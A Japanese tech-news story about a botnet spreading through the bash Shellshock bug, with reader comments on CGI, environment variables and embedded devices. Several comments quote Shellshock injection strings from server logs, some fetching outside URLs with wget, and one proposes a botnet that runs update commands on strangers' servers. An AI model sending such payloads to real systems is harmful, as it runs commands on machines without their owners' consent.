パスワードを忘れた? アカウント作成
11601307 story
ボットネット

bashのShellshock脆弱性を利用するボットネットが出現 69

ストーリー by headless
出現 部門より
先日発見されたbashの脆弱性「Shellshock」を利用するボットネットが出現したそうだ(iTnewsの記事本家/.)。

イタリアのセキュリティ企業Tiger SecurityのCEO、Emanuele Gentili氏によれば、このボットネットはLinuxサーバー上で動作する「wopbot」というもの。wopbotはインターネット上をスキャンしてShellshock脆弱性のあるシステムを探し出し、感染を広げていく。Gentili氏が入手したマルウェアのサンプルをサンドボックス内で解析したところ、米国防総省のIPアドレス範囲に対する大量のスキャンが行われることが判明したという。また、Akamaiのホストするサーバーに対するDDoS攻撃も行われていたとのこと。その後、Tiger Securityでは英国と米国のISPに連絡し、wopbotのC&Cサーバーとマルウェアをホストするサーバーをネットワークから切り離すことに成功している。

現在のところwopbotの感染台数は不明だが、Shellshock脆弱性による影響はOpenSSLのHeartbleed脆弱性以上のものになる可能性もあるとのことだ。
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • by Anonymous Coward on 2014年09月27日 17時10分 (#2683778)

    198.20.69.74(census1.shodan.io)から、

    GET / HTTP/1.1
    Cookie: () { :; }; /bin/ping -c 1 104.131.0.69
    Referer: () { :; }; /bin/ping -c 1 104.131.0.69
    User-agent: () { :; }; /bin/ping -c 1 104.131.0.69

    などというのがきてます。

    104.131.0.69は hello.data.shodan.io だそうです。
    ちなみに

    census1.shodan.io 198.20.69.74
    census2.shodan.io 198.20.69.98
    census3.shodan.io 198.20.70.114
    census4.shodan.io 198.20.99.130
    census5.shodan.io 93.120.27.62
    census6.shodan.io 66.240.236.119
    census7.shodan.io 71.6.135.131
    census8.shodan.io 66.240.192.138
    census9.shodan.io 71.6.167.142
    census10.shodan.io 82.221.105.6
    census11.shodan.io 82.221.105.7
    census12.shodan.io 71.6.165.200
    census.shodan.io 208.180.20.97

    • by Anonymous Coward on 2014年09月28日 1時07分 (#2683951)

      我が家のapacheでgrep '()' access_logしたら昨日の時点でもかなりのアクセスが見つかりました
      確認しているだけで
      () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://example.com/'
      () { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://exmaple.com/ [dipad.biz]\"
      () { :;};echo Content-type:text/plain;echo;/bin/ls /etc/resolv.conf;exit
      () { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit
      () { :; }; echo Mozilla: `echo K3Vbs0di2P`
      などなどいろんなパターンがありますね

      親コメント
    • by Anonymous Coward

      なるほど。その手の変数名をつかうと、より効果的に攻撃出来るんですね。

      • by Anonymous Coward
        変数名というか、これらのリクエストヘッダの内容を環境変数に置く様なサーバーの場合に、pingが送られてバレるってことですね。

        Apacheのmod_envとか、Appサーバーとの連携で環境変数つかってたりするのも狙われるわけだ。

        なるほど、こういう攻撃方法を考えつくわけか…。
    • by Anonymous Coward

      全ヘッダのログを取るには、mod_log_forensic使わないとだめなのか。 環境変数が何でもよいというのは痛いなぁ。

      http://httpd.apache.org/docs/2.4/mod/mod_log_forensic.html [apache.org]

  • by annoymouse coward (11178) on 2014年09月27日 17時36分 (#2683787) 日記

    ボットネットを作るなら、脆弱性を使って、bashを 修正 して回るボットネットを作って欲しかったですね

    たとえば curl あたりを使って HTTP経由で
    '() { :;}; yum update bash'
    '() { :;}; apt-get update && apt-get install bash'
    みたいな文字列を撒き散らすだけで、 redhat系、 debian系のサーバは大抵修正できる筈です。文字列を少し変えれば、他のOSにも対応できます

    脆弱性を抱えたサーバも減るし、それを踏み台にした攻撃も減るので、多くの人が幸せになれるんですけどねぇ。

  • by Anonymous Coward on 2014年09月27日 16時02分 (#2683742)

    bashの脆弱性がニュースになってたけど、bash自体の説明が

    > インターネットのホームページを表示するサーバーで広く利用されているプログラム

    となってて、うーん間違ってないけどあってもいないような。
    もやもやした。

    • by Anonymous Coward on 2014年09月28日 0時16分 (#2683936)

      だって一般向けだぜ。
      他に何て言えばいいのさって話さ。

      毎日こういうのを考えなきゃならん境遇にいるのでAC
      この境遇いつまで続くんだろ・・

      親コメント
      • どっちからも文句言われるしんどい仕事だよね。。。
        親コメント
      • by Anonymous Coward

        マジレスだけど、そういう仕事が社会ではそういうのが実は一番大事なんだと思う。技術と人との橋渡し。
        頑張って下さい。楽しんで下さい。良い仕事して下さい。ほんとに。
        まあ、昔、そんな仕事に関わってたので。

    • by Anonymous Coward

      結構あってるんじゃないの。

      インストールベースで考えると、「サーバー用途のマシン」と「bashをインストールしているマシン」にはかなりの強相関があるだろうから。Unix系でもandroidとかはほとんどbash載せてないわけだし、デスクトップLinuxとかIISとか誤差だし。

      • by Anonymous Coward

        自分のAndroidにはbash入ってるけど、これ標準じゃなかったのか

        • まあ、busybox bash っていうのもあって。/bin/shを/bin/bashにリンクしてみたり、/bin/bashを/bin/busyboxにしてみたり。
          あっちは大丈夫なのかな…?

          # カスタマイズが普通のwebサーバはいいけど、ブラックボックスになってるロードバランサとかはなあ
          # 複合機のDHCPクライアントの問題とかもう石油ストーブみたいな対処が向いてるんじゃないか

          親コメント
      • by Anonymous Coward

        >IISとか誤差だし。

        シェアNo1のソフトが、誤差だとすると、誤差じゃないWebサーバって何なんだろう。

        • by Anonymous Coward

          自分にとって都合のいい情報以外は見えない人たちだから…。

        • by Anonymous Coward

          アクセス数トップ100万未満の泡沫サイトで人気なだけじゃん

      • by Anonymous Coward

        ウェブをサービスするために利用されてると誤解されるからどうかと思う。
        ウェブサーバーじゃなければ問題ないと思われそう。

        この際、サーバーの多くに利用されてるプログラム、でいいと思うが、

        • by Anonymous Coward

          ssh接続でもヤバいんだが
          勘違いしてるコメントがちらほらと

          • by Anonymous Coward
            コマンド制限無視してなんでも実行できる以外ありましたっけ?
            アカウント持ってなくてもコマンドながせるみたいなのがあればやばいけど。

            # 制限なしの方は共有レンタルサーバーとかアップデートされないとやばそうだけどね。
  • by kemeco (41597) on 2014年09月27日 18時52分 (#2683829)

    うちの無線LANルーターは中でlinuxが動いてるそうなんだけど、ついでにbashまで動いてました的なことがないことを祈ってます(ガクブル
    考えすぎ?

    • by Anonymous Coward on 2014年09月27日 19時25分 (#2683848)

      組み込みだと、bashよりもbusybox ashが多いんじゃないかな? ルーターファームウェアのOpenWrtとDD-WRTは共にbusybox ashだったはず。

      親コメント
      • by Anonymous Coward

        うわああ!
        busyboxは洒落にならん!
        軽いから結構普及してるだろ?
        数が多いからパッチなんて当てきれないだろ?

  • by Anonymous Coward on 2014年09月27日 16時12分 (#2683745)

    聞き直してみたら、おまえの心臓が止まるまで不十分だとか歌われてました。

    bashなど使っていると心臓が止まるまでゲームをやらされることになるらしい…

    http://en.wikipedia.org/wiki/Shellshock_(song) [wikipedia.org]

    • by Anonymous Coward

      指先一つでダウンさ!(ッターン)
      # sync; sync; halt;

      ってのを思い浮かべた。

  • by Anonymous Coward on 2014年09月27日 16時21分 (#2683752)

    でも標準SHELLをbashにしてる環境が多すぎたり、入力データをまんまSHELLに投げてるプログラムとか
    テスト不足のWebServerを代表とするdaemon群が一番悪い気がするんだがなぁ…

    • テスト不足のWebServerを代表とするdaemon群が一番悪い気がするんだがなぁ…

      今回のバグは、bashが環境変数中に仕込まれたコードを実行してしまう、というものです。そして、リクエスト中のヘッダフィールドを環境変数として渡すことは、CGIの仕様によって要求されています(RFC 3875 [ietf.org])。したがって今回の脆弱性は、Webサーバが仕様通りに動作することがテストされていたとしても、回避することはできません。

      攻撃っぽいフィールドを弾いてほしいところかも知れませんが、それは汎用のWebサーバではなくWAFの役割だと思います。

      親コメント
      • by Anonymous Coward

        bash を #!/bin/sh として起動しても今回の問題が避けられないところまでは確認しましたが、
        この環境変数で関数を…って仕様は素の sh にはあるのでしょうか?
         (問題があるかどうか以前の問題として)

        # 素の sh って定義がアレだとは思いますが…

    • by Anonymous Coward

      常識的に考えて標準シェルはcshだよな

      • by Anonymous Coward

        そうだね、login shell は (t)csh, シェルスクリプトは (POSIX 互換でない、Solaris のやや古臭い) /bin/sh 向けのが最高だね。

        ※利用者の個人的な感想です。

      • by Anonymous Coward

        どっから見てもcshとかロクなもんじゃねえ。

    • by Anonymous Coward

      お前が物事を広く見られない人間だというのは分かった

      • by Anonymous Coward

        広い(グローバル)視野(スコープ)がないから環境変数使ってますねん(♪デンデン)

  • by Anonymous Coward on 2014年09月27日 17時56分 (#2683798)

    CGIとかイマドキそんなに多くないと思うけど、ここまで大騒ぎしてる理由がわかんないなぁ

    • by yasu (7) on 2014年09月27日 23時22分 (#2683923) ホームページ

      いいえ。

      Unixでは、プログラムが内部的にコマンドを呼び出す際 /bin/sh (OSによってはbashへのシンボリックリンク) を経由させること、環境変数を経由して外部からのデータの受け渡しをすることは非常に多く行われています。そのような処理をしている場合にはCGIプログラムに限らず (もちろん、HTTPに限らず他のサービスでも) 影響を受ける可能性があります。

      CGI以外のWebサービス周りで言えば、たとえば、Passenger (Ruby on Rails で利用される) では、ワーカープロセス起動時に /bin/sh を経由するため、今回の影響を受ける可能性があります [phusion.nl]。

      --
      HIRATA Yasuyuki
      親コメント
    • by Anonymous Coward

      日本国政府なめてんの?

    • by Anonymous Coward

      勘違いしてるコメントってこういうのか

    • by Anonymous Coward

      自分が使ってるかどうかとサーバで使えるように設定されているかは別だろう。
      レンタルサーバなんかでファイルを置くだけで許可を変えられるなら、わざと自分のファイル以外にアクセスするように仕組んだコンテンツをアップロードされる可能性だってある。
      本来できないはずのあんなこともこんなこともやり放題だ。

  • by Anonymous Coward on 2014年09月28日 7時54分 (#2683987)

    いやですねぇ

typodupeerror

アレゲは一日にしてならず -- アレゲ研究家

読み込み中...